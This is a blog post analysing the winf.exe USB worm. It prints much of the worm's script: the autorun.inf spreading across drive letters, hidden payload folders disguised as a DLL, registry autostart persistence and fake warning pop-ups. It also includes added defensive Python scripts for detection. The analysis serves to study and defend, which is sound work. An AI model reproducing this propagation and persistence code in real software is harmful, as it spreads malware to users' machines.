Random thoughts shooting out of volatile mind
winf.exe Dissected
Well folks, I got my hands on the worm winf.exe from my friend's pen drive, even though I couldn't get much because Avast had already deleted the harmful parts. But I could save the following files.
1. install.txt
2. pathlist.txt
3. drivelist.txt
4. thb.ico (which appears as the drive icon)
5. DLL.ico (which is used to mask the programs as a DLL file in system folders)
6. Icon.ico (used to hide winf.exe)


If you want to see these files, just rename winf.exe to winf.rar and extract it. When I went through the files I got a rough idea of how it works, which I'm going to explain here.
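Before renaming a suspect executable to .rar, a defender can confirm that it really is a self-extracting RAR by looking for the RAR archive signature that sits after the SFX stub. The following Python script is an added example, not code from the original post or from the worm: it scans a file for the RAR 1.5-4.x and RAR5 magic bytes, classifies the file as a plain archive, an SFX, or neither, and carves the archive body out so it can be listed with a normal archiver without ever executing the stub. The sample bytes are constructed inline and contain no real payload.

```python
# Magic bytes found at the start of a RAR archive.
RAR4_SIG = b"Rar!\x1a\x07\x00"      # RAR 1.5 - 4.x
RAR5_SIG = b"Rar!\x1a\x07\x01\x00"  # RAR 5.x


def find_rar_archive(data):
    """Return (offset, version) of the first RAR signature in data, or None.

    In an SFX executable the PE stub comes first and the archive follows it,
    so the signature is found at a non-zero offset.
    """
    best = None
    for sig, version in ((RAR5_SIG, 5), (RAR4_SIG, 4)):
        off = data.find(sig)
        if off != -1 and (best is None or off < best[0]):
            best = (off, version)
    return best


def classify(data):
    """Describe the bytes: plain RAR archive, RAR SFX executable, or neither."""
    hit = find_rar_archive(data)
    if hit is None:
        return {"kind": "not-rar"}
    offset, version = hit
    is_pe = data[:2] == b"MZ"  # DOS/PE header of an SFX stub
    kind = "rar-sfx" if (is_pe and offset > 0) else "rar"
    return {"kind": kind, "offset": offset, "version": version}


def carve_archive(data):
    """Return the archive bytes from the RAR signature onward (None if absent)."""
    hit = find_rar_archive(data)
    return None if hit is None else data[hit[0]:]


def carve_file(exe_path, out_path):
    """Write the embedded archive of exe_path to out_path; True on success."""
    with open(exe_path, "rb") as fh:
        data = fh.read()
    body = carve_archive(data)
    if body is None:
        return False
    with open(out_path, "wb") as fh:
        fh.write(body)
    return True


# Constructed samples: a fake 64-byte "MZ" stub followed by a RAR4 signature,
# and a plain executable with no archive in it.
SAMPLE_SFX = b"MZ" + b"\x90" * 62 + RAR4_SIG + b"<archive body>"
SAMPLE_PLAIN_EXE = b"MZ" + b"\x90" * 100

if __name__ == "__main__":
    print(classify(SAMPLE_SFX))        # rar-sfx at offset 64
    print(classify(SAMPLE_PLAIN_EXE))  # not-rar
```

The carved archive can be listed and extracted with any RAR-aware tool, which shows the dropped files (install.txt, pathlist.txt, the icons) without running winf.exe to see what it does.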

The sfx should be created with the extracting path as %temp%      *
 and the program to run after extract is , winf.exe install.txt * 


These lines tell us that install.txt is an input to winf.exe. Next, the program is supposed to read the following registry entry:
HKEY_LOCAL_MACHINE,SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\Run,status 

If the system is already infected, the program simply exits. The following lines do this:
Regread,regvalue,REG_SZ,HKEY_LOCAL_MACHINE,SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\Run,status
 ifequal,regvalue,present
  exitapp


Next it reads the file pathlist.txt, which has the following contents:
C:\WINDOWS\system32\win.dll
D:\RECYCLE
E:\RECYCLE
F:\RECYCLE 

ArrayCount = 0
Loop, Read,%temp%\winf\pathList.txt
{
    ArrayCount += 1
    Array%ArrayCount% := A_LoopReadLine
}

Loop %ArrayCount%
{
    path1 := Array%A_Index%

    Ifexist,%path1%
      Ifexist,%path1%\win.exe
        Ifexist,%path1%\std.txt
          exitapp

    FileCreateDir,%path1%
    if errorlevel
        continue
    else
    {
        Filecopy,%temp%\winf\win.exe,%path1%\
        if errorlevel
            continue
        Filecopy,%temp%\winf\avgs.exe,%path1%\
        Filecopy,%temp%\winf\drivelist.txt,%path1%\
        Filecopy,%temp%\winf\win.mp3,%path1%\
        Filecopy,%temp%\winf\icon.ico,%path1%\
        Filecopy,%temp%\winf\thb.ico,%path1%\
        Filecopy,%temp%\winf\DLL.ico,%path1%\
        FileCreateDir,%path1%\reg.bkp
        break
    }
}
Filesetattrib,+SH,%path1%


Well, look at the above piece of code. As I interpret it, the path is first copied into a variable, then it checks whether the path already exists and whether files like win.exe and std.txt are present; if so, the system is already infected and the program exits. If they are not present, all the files are copied into all the specified paths. Then the path's attributes are changed so that it acts as a hidden system file; the last line of the above code does this.
See the following code:

Filesetattrib,+SH,%temp%\thb.ico
Filesetattrib,+SH,%temp%\autorun.inf

filedelete,c:\autorun.inf
Filecopy,%temp%\winf\thb.ico,c:\
Filecopy,%temp%\winf\autorun.inf,c:\

filedelete,D:\autorun.inf
Filecopy,%temp%\winf\thb.ico,D:\
Filecopy,%temp%\winf\autorun.inf,D:\

filedelete,E:\autorun.inf
Filecopy,%temp%\winf\thb.ico,E:\
Filecopy,%temp%\winf\autorun.inf,E:\

filedelete,F:\autorun.inf
Filecopy,%temp%\winf\thb.ico,F:\
Filecopy,%temp%\winf\autorun.inf,F:\

filedelete,G:\autorun.inf
Filecopy,%temp%\winf\thb.ico,G:\
Filecopy,%temp%\winf\autorun.inf,G:\

filedelete,H:\autorun.inf
Filecopy,%temp%\winf\thb.ico,H:\
Filecopy,%temp%\winf\autorun.inf,H:\

filedelete,I:\autorun.inf
Filecopy,%temp%\winf\thb.ico,I:\
Filecopy,%temp%\winf\autorun.inf,I:\

filedelete,J:\autorun.inf
Filecopy,%temp%\winf\thb.ico,J:\
Filecopy,%temp%\winf\autorun.inf,J:\

filedelete,K:\autorun.inf
Filecopy,%temp%\winf\thb.ico,K:\
Filecopy,%temp%\winf\autorun.inf,K:\

filedelete,L:\autorun.inf
Filecopy,%temp%\winf\thb.ico,L:\
Filecopy,%temp%\winf\autorun.inf,L:\

filedelete,M:\autorun.inf
Filecopy,%temp%\winf\thb.ico,M:\
Filecopy,%temp%\winf\autorun.inf,M:\



This code first changes the attributes of the files extracted into the temp folder so that they act as system files. Then it deletes any autorun.inf that may be present in all the drives, and winf.exe, autorun.inf and thb.ico are copied into all the drives. Further, it checks to make sure all copies are present and makes a backup copy. I couldn't properly interpret this part; see it below.



ArrayCount = 0
Loop, Read,%temp%\winf\driveList.txt
{
    ArrayCount += 1
    Array%ArrayCount% := A_LoopReadLine
}

Loop %ArrayCount%
{
    drivename := Array%A_Index%
    ;search in the root of all drives in the drivelist
    ifexist,%drivename%:\winf.exe
    {
        Filecopy,%drivename%:\winf.exe,%path1%\reg.bkp\winf.exe
        break
    }
    else
        continue
}
Filesetattrib,+SH,%path1%\reg.bkp\winf.exe


Further, it creates desktop.ini and autorun.inf files and fills them with the content shown in the code below.
;*******************************create desktop.ini*************************************
ifnotexist,%path1%\Desktop.ini
Fileappend,
(
[.ShellClassInfo]
IconFile=C:\WINDOWS\system32\win.dll\DLL.ico
IconIndex=0
),%path1%\Desktop.ini
Filesetattrib,+SH,%path1%\Desktop.ini



;*******************************create autorun.inf*******************************
;Open=win.dll.exe
;shell\open\command=..\winf.exe
ifnotexist,%path1%\reg.bkp\autorun.inf
Fileappend,
(
[Autorun]
open=winf.exe
shellexecute=winf.exe
shell\Auto\command=winf.exe
),%path1%\reg.bkp\autorun.inf
Filesetattrib,+SH,%path1%\reg.bkp\autorun.inf
;*******************************end of autorun.inf******************************* 
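Everything the post has traced so far leaves a recognisable footprint on a drive: an autorun.inf in the root whose open, shellexecute or shell\...\command keys point at an executable sitting beside it, a thb.ico next to it, a hidden RECYCLE directory (or a directory called win.dll under system32, a folder masquerading as a DLL) holding win.exe, avgs.exe and std.txt, and a Desktop.ini giving that folder a custom icon. Note also that the pathlist loop breaks after the first directory it manages to create, so a given machine ends up with one payload directory rather than one per path. The script below is an added example of how a defender could check a mounted drive for that footprint; it is not the worm's code and not from the original post. It parses autorun.inf using the same key names shown above, checks for the dropped files, and on Windows reports whether the payload directory carries the hidden+system attributes set by Filesetattrib,+SH. The demo() helper builds a constructed sample layout in a temporary directory (empty stand-in files, no real malware) so the check runs offline.

```python
import os
import re
import tempfile

# Windows file attribute bits set by Filesetattrib,+SH (Win32 constants;
# os.stat exposes st_file_attributes only on Windows).
FILE_ATTRIBUTE_HIDDEN = 0x02
FILE_ATTRIBUTE_SYSTEM = 0x04

# autorun.inf keys that make Explorer launch a program on insert or double-click.
LAUNCH_KEY = re.compile(r"^(open|shellexecute|shell\\[^\\=]+\\command)\s*=\s*(.+?)\s*$",
                        re.IGNORECASE)

# File names the post says the worm drops.
ROOT_DROPS = ("winf.exe", "thb.ico")
PAYLOAD_DIR_DROPS = ("win.exe", "avgs.exe", "std.txt", "drivelist.txt", "win.mp3")
PAYLOAD_DIRS = ("RECYCLE", os.path.join("WINDOWS", "system32", "win.dll"))


def parse_autorun(text):
    """Return [(key, target)] for launch keys found in the [Autorun] section."""
    launchers = []
    in_autorun = False
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";"):
            continue
        if line.startswith("[") and line.endswith("]"):
            in_autorun = line[1:-1].strip().lower() == "autorun"
            continue
        m = LAUNCH_KEY.match(line) if in_autorun else None
        if m:
            launchers.append((m.group(1).lower(), m.group(2)))
    return launchers


def is_hidden_system(path):
    """True if path has both hidden and system attributes (always False off Windows)."""
    attrs = getattr(os.stat(path), "st_file_attributes", 0)
    both = FILE_ATTRIBUTE_HIDDEN | FILE_ATTRIBUTE_SYSTEM
    return attrs & both == both


def scan_drive_root(root):
    """Return human-readable findings for one drive root."""
    findings = []
    autorun = os.path.join(root, "autorun.inf")
    if os.path.isfile(autorun):
        with open(autorun, encoding="latin-1", errors="replace") as fh:
            for key, target in parse_autorun(fh.read()):
                present = os.path.isfile(os.path.join(root, target))
                findings.append(f"autorun.inf: {key} launches {target}"
                                + (" (present in root)" if present else " (target missing)"))
    for name in ROOT_DROPS:
        if os.path.isfile(os.path.join(root, name)):
            findings.append(f"dropped file in root: {name}")
    for dirname in PAYLOAD_DIRS:
        payload_dir = os.path.join(root, dirname)
        if not os.path.isdir(payload_dir):
            continue
        dropped = [n for n in PAYLOAD_DIR_DROPS if os.path.isfile(os.path.join(payload_dir, n))]
        if dropped:
            findings.append(f"payload directory {dirname} holds: {', '.join(dropped)}")
        if os.path.isfile(os.path.join(payload_dir, "Desktop.ini")):
            findings.append(f"{dirname} carries a Desktop.ini (custom folder icon)")
        if is_hidden_system(payload_dir):
            findings.append(f"{dirname} is marked hidden+system")
    return findings


# Constructed sample: the autorun.inf body quoted in the post.
SAMPLE_AUTORUN = "[Autorun]\nopen=winf.exe\nshellexecute=winf.exe\nshell\\Auto\\command=winf.exe\n"


def demo():
    """Build a constructed sample drive layout in a temp dir and scan it."""
    root = tempfile.mkdtemp(prefix="winf_demo_")
    with open(os.path.join(root, "autorun.inf"), "w") as fh:
        fh.write(SAMPLE_AUTORUN)
    for name in ROOT_DROPS:
        open(os.path.join(root, name), "wb").close()  # empty stand-ins
    payload = os.path.join(root, "RECYCLE")
    os.mkdir(payload)
    for name in ("win.exe", "avgs.exe", "std.txt"):
        open(os.path.join(payload, name), "wb").close()
    return scan_drive_root(root)


if __name__ == "__main__":
    for line in demo():
        print(line)
```

Run scan_drive_root against each removable drive root (for example "E:\\") to get the same report for a real pen drive; the hidden+system line only appears on Windows, where os.stat exposes the attribute bits.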



Further, it writes the following registry values:
HKEY_LOCAL_MACHINE,SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\Run,status,present
HKEY_LOCAL_MACHINE,SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\Run,winlogon 
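The status value is the worm's own "already infected" marker (the same one the Regread check at the top looks for), and it lives in a key whose values are all logon autostarts: Explorer launches everything listed under HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\Run at logon, the key Group Policy uses for "Run these programs at user logon". The Python below is an added example, not from the post, of checking that key: check_explorer_run_policy works on a plain dict so it can be tested offline, and read_explorer_run_policy reads the live key with winreg when run on Windows. The post does not show the data of the winlogon value, so the constructed sample uses an obvious placeholder for it.

```python
import sys

POLICY_RUN_KEY = r"SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\Run"

# Marker value and known value name the post says the worm writes under the key.
INFECTION_MARKER = ("status", "present")
KNOWN_VALUE_NAMES = {"winlogon"}


def check_explorer_run_policy(values):
    """Inspect {value_name: data} taken from the policy Run key; return findings.

    Every value under this key is a logon autostart, so anything present is
    listed; the worm's marker and its known value name are called out by name.
    """
    findings = []
    for name, data in values.items():
        lname = name.lower()
        if (lname, str(data).lower()) == INFECTION_MARKER:
            findings.append(f"infection marker found: {name}={data}")
        elif lname in KNOWN_VALUE_NAMES:
            findings.append(f"known worm autostart value: {name}={data}")
        else:
            findings.append(f"unexpected logon autostart: {name}={data}")
    return findings


def read_explorer_run_policy():
    """Read the live key on Windows; returns {} if absent or not on Windows."""
    if sys.platform != "win32":
        return {}
    import winreg
    values = {}
    try:
        key = winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, POLICY_RUN_KEY)
    except OSError:
        return values
    with key:
        index = 0
        while True:
            try:
                name, data, _ = winreg.EnumValue(key, index)
            except OSError:  # no more values
                break
            values[name] = data
            index += 1
    return values


# Constructed sample; the winlogon data is a placeholder because the post
# does not show what the worm writes there.
SAMPLE_VALUES = {
    "status": "present",
    "winlogon": "<PLACEHOLDER: data not shown in the post>",
}

if __name__ == "__main__":
    live = read_explorer_run_policy()
    for line in check_explorer_run_policy(live or SAMPLE_VALUES):
        print(line)
```

On a clean machine that is not under Group Policy the key is normally absent or empty, so any value at all is worth a look; removing the status value also removes the marker the worm uses to decide it is already installed.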


This is also the virus that pops up message boxes when you visit Orkut or YouTube. These are the kind of messages you will get, and it also plays a sound ;).

message1=    msgbox,262160,WARNING,orkut is sending viruses to your pc. To protect your pc close this window ``r``r                orkut is infected by jammer worm ,30
message2=    msgbox,262160,File missing,TCP/IP module Missing from npqtplugin4.dll. it may infected by virus  ``r``r       ,30
message3=    msgbox,262160,WARNING,Dangerous script send by youtube, Windows system files damage if this script run``r``r                   

There are still many things this virus can do; I can't explain everything here ;). Whenever you see winf.exe files, just scan them once to remove all the harmful programs (win.exe, avgs.exe, reg.bkp); then you are left with only the text, image and mp3 files. If I interpreted something wrongly here, please correct me in your comments.
Posted by: copyninja on Wednesday, 7 January 2009
